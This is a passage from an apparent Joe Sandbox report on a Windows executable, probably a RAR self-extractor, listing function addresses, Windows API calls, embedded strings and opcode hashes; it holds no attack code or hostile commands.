                                                                              • Instruction ID: a9271261d6be39f4c555a400d6503eaccb4fd480fea43ccbd7a066b4242a8a70
                                                                              • Opcode Fuzzy Hash: 44602fb6543f9caf9aef4fd8b561e6a40465bfca6445088e378e271bfbce74c2
                                                                              • Instruction Fuzzy Hash: 5901B172614210AFDB105F26AC44E667BFAD789748F0A402BF142B33B3C2225C888B34
                                                                              Function 00DDBA59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00DDBA90
                                                                              • RegisterClassExW.USER32(00000030), ref: 00DDBAB1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ClassCursorLoadRegister
                                                                              • String ID: 0$RarHtmlClassName
                                                                              • API String ID: 1693014935-3342523147
                                                                              • Opcode ID: 0d8f4095804ced938d073a0c618054263c973e49dd58bcb6df97875ca6874148
                                                                              • Instruction ID: e28ee2fe449118135ff3c0f453eef44cddb827d2eb836c8d12684e71d6d7bf07
                                                                              • Opcode Fuzzy Hash: 0d8f4095804ced938d073a0c618054263c973e49dd58bcb6df97875ca6874148
                                                                              • Instruction Fuzzy Hash: 0EF0C9B1D01219AFCB009F9AD8855DEFBB8FB48355F50502EE505B7340D7B45A048FA4
                                                                              Function 00DF4D5D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetConsoleOutputCP.KERNEL32(381977BE,00000000,00000000,00000008), ref: 00DF4DC0
                                                                                • Part of subcall function 00DF0E6B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00DEF84E,?,00000000,-00000008), ref: 00DF0ECC
                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DF5012
                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DF5058
                                                                              • GetLastError.KERNEL32 ref: 00DF50FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                              • String ID:
                                                                              • API String ID: 2112829910-0
                                                                              • Opcode ID: 0f3f10069cd93654e27ec81e111fe7c7a84b8aba9bf9661537c8f8b31aa3100c
                                                                              • Instruction ID: 5cad849b403b841c6290ce068301eee76e115a3812806e638256e8034c03d71a
                                                                              • Opcode Fuzzy Hash: 0f3f10069cd93654e27ec81e111fe7c7a84b8aba9bf9661537c8f8b31aa3100c
                                                                              • Instruction Fuzzy Hash: BCD17C75D0064C9FCF15CFA8D880AAEBBB5FF09310F19812AE655EB351D730A941CB60
                                                                              Function 00DE64EA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustPointer
                                                                              • String ID:
                                                                              • API String ID: 1740715915-0
                                                                              • Opcode ID: 1578b25163c5f74c5dfb213e9c03c82ad8bad95a2d555894f632fef7d23ae467
                                                                              • Instruction ID: 5cda8f383ccedfedd115b7b655d34c9754b75afcc86df0433e7e9cf597658507
                                                                              • Opcode Fuzzy Hash: 1578b25163c5f74c5dfb213e9c03c82ad8bad95a2d555894f632fef7d23ae467
                                                                              • Instruction Fuzzy Hash: 43510172A00682AFDB29AF16D855B7A77B4FF20350F18416DEC06576A1E731ED81CBB0
                                                                              Function 00DCE7AF Relevance: 6.1, APIs: 4, Instructions: 115fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DCE7B6
                                                                              • GetStdHandle.KERNEL32(000000F5,0000002C,00DD26A7,?,?,?,?,00000000,00DDA1F2,?,?,?,?,?,00DDA19F,?), ref: 00DCE7DF
                                                                              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,?,00000000,00DDA1F2,?,?,?,?,?), ref: 00DCE825
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: FileH_prolog3_HandleWrite
                                                                              • String ID:
                                                                              • API String ID: 2898186245-0
                                                                              • Opcode ID: 9ed029b5e67a4782826eb291d5bb4419288bd94f14cb7716a54b2c300bb78c35
                                                                              • Instruction ID: 94a03b454c1abea51de0b13b6c6ccad5612e241dd1f47810324096ceaac2cf16
                                                                              • Opcode Fuzzy Hash: 9ed029b5e67a4782826eb291d5bb4419288bd94f14cb7716a54b2c300bb78c35
                                                                              • Instruction Fuzzy Hash: AE4189B5A0121AABDF14DF64D884FADBB7AEF85710F08811DF801AB281CB719D44CBB1
                                                                              Function 00DEFB2A Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00DF0E6B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00DEF84E,?,00000000,-00000008), ref: 00DF0ECC
                                                                              • GetLastError.KERNEL32 ref: 00DEFB8E
                                                                              • __dosmaperr.LIBCMT ref: 00DEFB95
                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00DEFBCF
                                                                              • __dosmaperr.LIBCMT ref: 00DEFBD6
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1913693674-0
                                                                              • Opcode ID: 04cda41b6da1f2641a92a33c3708d46e3106a83ee9648eb5330607d986cd82ab
                                                                              • Instruction ID: f4b6c5624b8ce0ee37a9627806d8a89f019103a0b49db96d8d68908f48039bcc
                                                                              • Opcode Fuzzy Hash: 04cda41b6da1f2641a92a33c3708d46e3106a83ee9648eb5330607d986cd82ab
                                                                              • Instruction Fuzzy Hash: B3219D71604799AF9B20BF62C8A0D6BBBADEF003647148529F969D7251D730EC40CBB1
                                                                              Function 00DF0F0E Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00DF0F16
                                                                                • Part of subcall function 00DF0E6B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00DEF84E,?,00000000,-00000008), ref: 00DF0ECC
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DF0F4E
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DF0F6E
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                              • String ID:
                                                                              • API String ID: 158306478-0
                                                                              • Opcode ID: 6e1cff77cf942fb0b2c15f492572cd566fe74c0866bbec008feb586b6928a620
                                                                              • Instruction ID: 1ec72dd492e5f98da0d1c3c82b5235b05a72227767c573d5c565444433837bc0
                                                                              • Opcode Fuzzy Hash: 6e1cff77cf942fb0b2c15f492572cd566fe74c0866bbec008feb586b6928a620
                                                                              • Instruction Fuzzy Hash: E91122B150975DBEAB3127B69C89CBF7E6CEE843A43168425F602DB202EB24DD0181B1
                                                                              Function 00DF7427 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00DF6803,00000000,00000001,?,00000008,?,00DF514F,00000008,00000000,00000000), ref: 00DF743E
                                                                              • GetLastError.KERNEL32(?,00DF6803,00000000,00000001,?,00000008,?,00DF514F,00000008,00000000,00000000,00000008,00000008,?,00DF56F2,00000000), ref: 00DF744A
                                                                                • Part of subcall function 00DF7410: CloseHandle.KERNEL32(FFFFFFFE,00DF745A,?,00DF6803,00000000,00000001,?,00000008,?,00DF514F,00000008,00000000,00000000,00000008,00000008), ref: 00DF7420
                                                                              • ___initconout.LIBCMT ref: 00DF745A
                                                                                • Part of subcall function 00DF73C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DF73F4,00DF67F0,00000008,?,00DF514F,00000008,00000000,00000000,00000008), ref: 00DF73D8
                                                                              • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00DF6803,00000000,00000001,?,00000008,?,00DF514F,00000008,00000000,00000000,00000008), ref: 00DF746F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                              • String ID:
                                                                              • API String ID: 2744216297-0
                                                                              • Opcode ID: 4a42ebd44c2fd0002f981b7f95681719960fb2d92d0742b1096c3d7bbaed1217
                                                                              • Instruction ID: 18a754257fb167a38e91e8f599bd67de3f6dc5e18434f2cf472c5389b16c1cc2
                                                                              • Opcode Fuzzy Hash: 4a42ebd44c2fd0002f981b7f95681719960fb2d92d0742b1096c3d7bbaed1217
                                                                              • Instruction Fuzzy Hash: 1BF09E36544118BBCF222F95DC059AA7E65FB093A1B46C411FE5995120DB32C861DBB4
                                                                              Function 00DE301E Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SleepConditionVariableCS.KERNELBASE(?,00DE2FBB,00000064), ref: 00DE3041
                                                                              • LeaveCriticalSection.KERNEL32(00E090B0,00000039,?,00DE2FBB,00000064,?,00E13550,?,00DD7F1E,00E13550,00000254,00DC3112,00000039,?), ref: 00DE304B
                                                                              • WaitForSingleObjectEx.KERNEL32(00000039,00000000,?,00DE2FBB,00000064,?,00E13550,?,00DD7F1E,00E13550,00000254,00DC3112,00000039,?), ref: 00DE305C
                                                                              • EnterCriticalSection.KERNEL32(00E090B0,?,00DE2FBB,00000064,?,00E13550,?,00DD7F1E,00E13550,00000254,00DC3112,00000039,?), ref: 00DE3063
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                              • String ID:
                                                                              • API String ID: 3269011525-0
                                                                              • Opcode ID: 5f69dd0c04b2e2fc3fb481279cf6affe89a4dd1813b88251f84dbcb86ea64ab9
                                                                              • Instruction ID: 19fc58914482faaf9f1d0893e595346d59ae94acaf5639fa07862ee517b2390e
                                                                              • Opcode Fuzzy Hash: 5f69dd0c04b2e2fc3fb481279cf6affe89a4dd1813b88251f84dbcb86ea64ab9
                                                                              • Instruction Fuzzy Hash: 34E06D31501324ABCB112F45EC1DABE3A24AB09B20B048012F909A62A2CB621940CBF9
                                                                              Function 00DDC73E Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00DDC741
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DDC750
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DDC75E
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00DDC76C
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Release
                                                                              • String ID:
                                                                              • API String ID: 1035833867-0
                                                                              • Opcode ID: d99e55e9bb658130622b967b23ae2bc88c5bc634cd2871ed02148f44dc5d4fe2
                                                                              • Instruction ID: 338d5246fe0d296bb54c2e88dcfd124416d52d7414a831bbd521b32eb5e97f1b
                                                                              • Opcode Fuzzy Hash: d99e55e9bb658130622b967b23ae2bc88c5bc634cd2871ed02148f44dc5d4fe2
                                                                              • Instruction Fuzzy Hash: A5E0E6B1642620AFD6511FB36D0DBD73B54DB49712F01C111F706BA3D1C664444C8F91
                                                                              Function 00DD1520 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 171COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3_
                                                                              • String ID: UNC$\\?\
                                                                              • API String ID: 2427045233-253988292
                                                                              • Opcode ID: c587b157d1a737b06d95007813506f970d20088f2741d374f87cf227e23b1648
                                                                              • Instruction ID: f4b88f48b3ab29f225fbe3ba257826f18ba8ca98871809ce91dd38e38a738730
                                                                              • Opcode Fuzzy Hash: c587b157d1a737b06d95007813506f970d20088f2741d374f87cf227e23b1648
                                                                              • Instruction Fuzzy Hash: 2151AF38A00115AACF14FBA4C8A2FFD777AEF56710F04415EF442A72D2DE645A4AC671
                                                                              Function 00DE6AE6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00DE6B0B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: EncodePointer
                                                                              • String ID: MOC$RCC
                                                                              • API String ID: 2118026453-2084237596
                                                                              • Opcode ID: 3b1e20e50b96508ebe6ab30300e30d4993bff93418d3ea991c1b986aa09f2bd4
                                                                              • Instruction ID: f12592bc70d4a785b84c4aba10c87d10959cfcfbb0b768e85fc44793240e51a8
                                                                              • Opcode Fuzzy Hash: 3b1e20e50b96508ebe6ab30300e30d4993bff93418d3ea991c1b986aa09f2bd4
                                                                              • Instruction Fuzzy Hash: DD416C71900289AFCF15EFA9CD81AEE7BB5FF18344F184069F904A7261D335D950DB60
                                                                              Function 00DD4D61 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00DD4B72: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DD4B91
                                                                                • Part of subcall function 00DD4B72: GetProcAddress.KERNEL32(00E09860,CryptUnprotectMemory), ref: 00DD4BA1
                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,00DD4C55), ref: 00DD4DF1
                                                                              Strings
                                                                              • CryptUnprotectMemory failed, xrefs: 00DD4DEA
                                                                              • CryptProtectMemory failed, xrefs: 00DD4DAD
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CurrentProcess
                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                              • API String ID: 2190909847-396321323
                                                                              • Opcode ID: a6806efd1bd5ad8e8267aeaf0d5e9c43bb4d98cc3ffa4a37e3ffd3454e7d6202
                                                                              • Instruction ID: 8614eccc23efd5c732014388fb2fe2d5de9fb7f09a2524340d3cef3e1758b674
                                                                              • Opcode Fuzzy Hash: a6806efd1bd5ad8e8267aeaf0d5e9c43bb4d98cc3ffa4a37e3ffd3454e7d6202
                                                                              • Instruction Fuzzy Hash: E8115632A04B216BD7251B2AAC45A7E779DEF82760708811FF854EB3D3EB309C4182B1
                                                                              Function 00DDE080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EndDialog.USER32(?,00000001), ref: 00DDE0D7
                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00DDE11B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: DialogItemText
                                                                              • String ID: GETPASSWORD1
                                                                              • API String ID: 1552716189-3292211884
                                                                              • Opcode ID: 163e40414f71bae5ea3664d7a37645beda606589510d906d0ca61913944ada66
                                                                              • Instruction ID: 7435e16af998b658b57ec1b6611934ffb1324e85422597c02dfe96a3362cd1f6
                                                                              • Opcode Fuzzy Hash: 163e40414f71bae5ea3664d7a37645beda606589510d906d0ca61913944ada66
                                                                              • Instruction Fuzzy Hash: C211C871B00218ABD714AF29DD4AFBA376CEB49700F04402AF645B7381DA75AD45C675
                                                                              Function 00DD6FD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,?,00DCFDA5,00000008,00000004,00DD26C1,?,?,?), ref: 00DD7024
                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00DCFDA5,00000008,00000004,00DD26C1,?,?,?,?,00000000), ref: 00DD7036
                                                                              Strings
                                                                              • Thread pool initialization failed., xrefs: 00DD7052
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Create$EventSemaphore
                                                                              • String ID: Thread pool initialization failed.
                                                                              • API String ID: 3431467744-2182114853
                                                                              • Opcode ID: b3c530a11ecd59e15207be6106457b017a2250717723a1b722354bd23ba00159
                                                                              • Instruction ID: b5dba23dee1d7b969199f0d2e50c457afc809a67463ef2ea2bd0c10507d254a3
                                                                              • Opcode Fuzzy Hash: b3c530a11ecd59e15207be6106457b017a2250717723a1b722354bd23ba00159
                                                                              • Instruction Fuzzy Hash: 41119D712447085BD2354F39D845BABBBECEF96750F14442FF1DA82380EAB1A9848B64
                                                                              Function 00DD6F4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00DD70DF,?,00DCFCB8,?,?,00DDA8DF,?,?,00DC5CB8,?,?,?,00000000), ref: 00DD6F52
                                                                              • GetLastError.KERNEL32(?,000000FF,?,00DD70DF,?,00DCFCB8,?,?,00DDA8DF,?,?,00DC5CB8,?,?,?,00000000), ref: 00DD6F5D
                                                                                • Part of subcall function 00DC9F0C: __EH_prolog3_GS.LIBCMT ref: 00DC9F13
                                                                              Strings
                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00DD6F66
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
